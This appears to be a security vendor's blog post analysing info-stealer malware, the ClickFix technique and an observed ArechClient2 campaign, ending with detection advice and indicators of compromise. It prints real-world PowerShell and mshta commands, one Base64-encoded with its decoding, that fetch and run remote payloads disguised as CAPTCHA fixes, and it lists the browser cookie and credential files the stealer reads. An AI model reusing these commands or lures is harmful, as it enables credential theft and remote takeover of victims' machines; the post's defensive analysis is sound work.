Long before a breach makes headlines, info stealers are already at work—silently siphoning credentials, session cookies, and other sensitive data, fueling the underground economy of cybercrime.
This type of malware isn’t just a threat to individual users; it endangers organizations worldwide, across every sector. This article aims to shed light on the latest trend of info stealers and provide actionable steps to help your organization safeguard its users and data.
What is Info Stealer Malware?
At their core, info stealers operate as stealthy data harvesters, infiltrating systems through phishing, malicious downloads, or compromised software to silently extract valuable credentials, financial information, and personal information, such as autofill form data and browser history. In one way or another, a user is usually tricked into allowing an info stealer to run on their machine. Attackers seek to gain initial access through compromised credentials, blackmail material, and stolen data for monetary profit.
Info stealers are often categorized by how they execute, but the key differences lie in how they evade detection and deliver their payloads—not in their core functionality. Some are embedded in malicious files, such as tampered software or phishing attachments, while others rely on script-based execution through PowerShell, Windows Management Instrumentation (WMI), or JavaScript loaders to reduce their footprint on disk and evade detection. Additionally, some specifically target browsers, injecting malicious extensions or hijacking active sessions. Regardless of the delivery mechanism, the end goal remains the same: silently harvesting sensitive information for financial or strategic gain.
Trends
According to AnyRun’s Top Malware Types in 2024 report, stealers ranked as the number one sandboxed malware threat by upload volume [1]. In 2023, stealers held the second-place position with 18,290 detections, but surged to the top in 2024 with 51,291 detections—a staggering 180% increase year over year.
While “stealer” in this context refers to a broad category of malware, the key takeaway remains clear: attackers are increasingly focused on stealing user data. This trend is echoed by other threat intelligence providers—Recorded Future, for instance, also reported that infostealers accounted for the highest number of infections throughout 2024 [2].
Finishing off December 2024, the world observed a large-scale compromise of over 30 Chrome browser extensions, a threat that was dubbed Infrared Ibis by Red Canary in their 2025 Intelligence Insight [3]. Millions of users were impacted in this attack that all started with a phishing attack, leading to an eventual browser-based stealer campaign. This attack set the tone for a rapid evolution into what we continue to see now at Cyderes—phishing and malvertising campaigns that trick users into running a PowerShell command on their machines leading to compromise if not mitigated.
Understanding the Attack Chain
In Cyderes’ recent analysis of stealer malware campaigns, we’ve observed a consistent attack pattern. Typically, a user is lured into clicking a malicious link delivered via phishing, malvertising, or a compromised third-party site. The campaign then escalates through social engineering, where the user is subtly guided into executing a malicious script. Once the payload is run, as we’ll show in a later example, it initiates command-and-control (C2) communications, followed by data collection and exfiltration.
These attacks often rely on creative social engineering to manipulate users into unwittingly executing malicious code. One such method is the increasingly popular ClickFix technique, which was coined by Proofpoint. Though the tactics may differ in execution, both exploit user behavior and require manual input as a key trigger for infection—highlighting the importance of user awareness and behavior-based detection.
ClickFix: A Common Tactic in Info Stealer Campaigns
ClickFix is a social engineering technique, where the user is presented with a manufactured “problem” that requires immediate action—such as a fake reCAPTCHA error, browser issue, or software failure. The “solution” typically involves copying and pasting a PowerShell or MSHTA command into a Windows prompt, unknowingly launching the attack.
An example of a simulated ClickFix attack can be found below and in John Hammond’s reCAPTCHA Phish GitHub repository [4], which mimics a CAPTCHA loop and walks users through running malicious code.
Below are some examples of command-line payloads that Cyderes has observed in the wild, typically used to stage second-level scripts and escalate attacks:
Observed Payload Variants
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$l='hxxps://example[.]com/rubdubfunong.m4a';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ''I am not a robot: CAPTCHA Verification UID: 7811''“C:\WINDOWS\system32\mshta.exe" hxxps://example[.]com/s5a.mp3 # ''I am not a robot - reCAPTCHA Verification ID: 2165
Cyderes Detection Engineering, notably Gus Nelson and Patryk Zochowski, have implemented enhanced protections to detect obfuscated payloads and defend against evasion techniques such as homoglyph abuse—further strengthening our detection capabilities.
Observed Threat Activity: Malware via a Trusted Vendor Site
In a real-world case, Cyderes investigated a stealer malware campaign delivered through a compromised third-party vendor site. The attackers exploited the legitimacy of a trusted website to distribute a malicious payload.
While there was no definitive evidence of a ClickFix-style prompt in this case, the behavior closely mirrored that pattern. The attack relied on user interaction—likely involving manual pasting into the Windows Run dialog—to execute a PowerShell command copied to the user's clipboard. This script appeared to initiate the next phase of the infection chain.
The observed payload was heavily obfuscated and used several common evasion techniques. The PowerShell command executed by the user was:
Example
-win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA
pAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAD
QANQAuADYAMQAuADEANQA5AC4AMQA0AC8AdAAvAHMAYQB3ACcAKQAgAHwAIABJAEUAe
AA=
Decoded
(New-Object Net.WebClient).DownloadString('hxxp://45.61.159[.]14/t/saw') | IEx
-win 1: Launches PowerShell in a hidden window.
-ep bypass: Short for -ExecutionPolicy, this bypasses any restrictions that might be in place
-noni: Non-interactive, disables interactive prompts.
-enc: Short for -EncodedCommand, this allows Base64 encoded commands to run.
By downloading the string, it executes a script located at that URL as seen below.
Invoke-WebRequest -Uri "hxxps://stable-connect-activity[.]help/new-york/amazing" -OutFile "$env:TEMP\Monday.zip"; Expand-Archive -Path "$env:TEMP\Monday.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\Flowers\photomap.exe"
The stable-connect-activity domain hosts a malicious zip file called ‘hw_update.zip’ and it automatically downloads if you visit the URL directly. By leveraging Invoke-WebRequest, the attacker downloads the payload to 'Monday.zip', which is then extracted to a temp directory and is ready for execution. Within the script, & "$env:TEMP\Flowers\photomap.exe" is used to then execute the malicious executable without user confirmation or validation from a subdirectory called Flowers.
Further analysis of the process tree showed the following:
-1.png?width=1100&height=521&name=Attack%20(2)-1.png)
Once ‘photomap.exe’ is executed, it appears to enable a Remote Access Trojan (RAT) and simultaneously executes ‘MSbuild.exe’, which then begins to communicate with an IP address located in Moscow, Russia and owned by a Hong Kong organization known as Chang Way Technologies Co. Limited (AS207566). Although the Pastebin URL observed in this case is no longer active, it likely served as a staging point for additional command and control instructions—an approach also documented in Developer and Malware Researcher dr4k0nia’s in-depth analysis of a similar malware sample [5].
When executed in a sandbox, photomap.exe accessed sensitive files and folders on the machine, such as:
- \User Data\Default\Network\Cookies
- Chrome\User Data\Default\Session Storage
- Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies
- Firefox\Profiles\...\cookies.sqlite-wal
- Firefox\Profiles\...\permissions.sqlite
- Firefox\Profiles\...\cert9.db, cert9.db-journal
- Firefox\Profiles\...\storage.sqlite, storage.sqlite-journal
- Firefox\Profiles\...\protections.sqlite-journal
- Firefox\Profiles\...\SiteSecurityServiceState.bin
- Firefox\Profiles\...\AlternateServices.bin
Not only was this malware an info stealer, but it was also a remote access trojan, which is associated with ArechClient2—a .NET RAT with numerous capabilities and stealth functions as well as the ability to profile victim systems, steal information, and launch a hidden secondary desktop to control browser session according to Malpedia [6].
The ClickFix method and the observed malware behavior illustrate core components of how info stealer campaigns unfold.
Defense and Mitigation
Why Info Stealers Often Go Undetected
One of the most concerning aspects of Info Stealer Malware is its ability to slip past traditional detection methods. Many modern stealers are fileless, relying on living-off-the-land binaries like Powershell, MSBuild, or ‘mshta.exe’ to operate entirely in memory. These tactics bypass legacy antivirus solutions that focus on file-based signatures. In addition, attackers often encode payloads in Base64 or obfuscate commands with homoglyphs to further evade detection and sandbox analysis.
The interchangeability nature of many stealers also allows threat actors to customize payloads for specific targets or campaigns. For instance, some variants include browser-specific modules to target credentials stored in Chrome, Firefox, or Edge, while others extend functionality to steal crypto wallets, clipboard contents or MFA backups.
With evasive techniques becoming standard, defenders must shift toward behavior-based detections, anomaly spotting and proactive threat hunting to stay ahead of these threats.
Detection Strategies and Proactive Defense Tactics
Given the stealthy and rapidly evolving nature of the info stealer threats, adopting proactive measures is essential to protect your organizational assets. Cyderes recommends the following best practices:
- Deploy advanced EDR solutions capable of behavior-based detections to uncover and isolate suspicious activities at the early stages of an attack.
- While EDRs may flag and report threats as 'mitigated' or ‘prevented’, the reality is that many info stealers can slip through—making robust detection logic and layered defenses are critical to closing the gap between alert and actual prevention.
- While EDRs may flag and report threats as 'mitigated' or ‘prevented’, the reality is that many info stealers can slip through—making robust detection logic and layered defenses are critical to closing the gap between alert and actual prevention.
- Continuous education campaigns and simulated phishing exercises significantly reduce the likelihood of successful social engineering attacks that lead to initial compromise.
- Utilize timely and actionable threat intelligence to keep defenses updated against the latest info stealer threats and indicators of compromise.
To support a layered defense strategy, the following techniques combined with Windows Event IDs can help identify suspicious behaviors associated with info stealers. These are just a few examples—there are numerous options for implementing effective detections depending on your environment, tools, and threat landscape:
Execution (Common in ClickFix attacks)
- Windows Event ID 4104 – Logs PowerShell script block execution (look for base64 encoded commands or domains)
- Windows Event ID 4688 – Tracks process creation; monitor for suspicious parent-child relationships (e.g., explorer.exe spawning powershell.exe or mshta.exe)
- Sysmon Event ID 1 (Process creation)
- Detect use of flags like -enc, -ExecutionPolicy Bypass, and suspicious DownloadString or Invoke-WebRequest commands
By implementing additional detection mechanisms and correlating them with threat intelligence and known IOCs, you can detect and stop infostealer activity before data is exfiltrated, a broader compromise begins, or user credentials are sold on the dark web.
Detection Strategies and Proactive Defense Tactics
At Cyderes, we understand the complexities of today's evolving threat landscape and the critical importance of safeguarding your digital assets. Our mission goes beyond simply responding to threats—we proactively partner with organizations to deliver comprehensive, intelligence-driven cybersecurity solutions tailored to your unique needs.
Through our managed detection and response (MDR) services, industry-leading threat intelligence, and cutting-edge cybersecurity practices, Cyderes equips organizations to rapidly identify, contain, and eradicate threats. Our expert teams provide continuous monitoring, threat hunting, and incident response capabilities, ensuring your defenses remain everyday ready.
Join forces with Cyderes to empower your organization against cyber threats, securing your data and reputation. Together, we turn cybersecurity into your competitive advantage.
Contributors
Jonathan Waknin
Director, Threat Management
Ruben Huerta
Principal Security Analyst
Cameron Walker
Principal Security Analyst
References
[1] https://any.run/cybersecurity-blog/malware-trends-2024/
[2] https://www.recordedfuture.com/research/2024-malicious-infrastructure-report
[3] https://redcanary.com/blog/threat-intelligence/intelligence-insights-february-2025/
[4] https://github.com/JohnHammond/recaptcha-phish
[5] https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/
[6] https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat
Additional Sources
- https://www.infostealers.com/article/the-silent-heist-cybercriminals-use-information-stealer-malware-to-compromise-corporate-networks/
- https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
IOCs
- Monday.zip - 0778a8c82e069614de1cca17660dd40881dea345ad0954a3e31492304edb9251
- hw_update.zip - acd1daa8455dd84d7d50714303c957cb673c5b5cb1e52e507cbb043a296c205b
- photomap.exe - 8fa9074cd74cbcedc44b12999dbc5f4e51ea82caa24be18b073686229f1f9db8
- 104.21.96[.]1
- 92.255.85[.]36
- hxxp://45.61.159[.]14/t/saw
- pastebin[.]com/raw/DWCCqGB0wKo+g
- stable-connect-activity[.]help
Ready to strengthen your organization's security posture?
For more cybersecurity insights, follow Cyderes on LinkedIn and X.
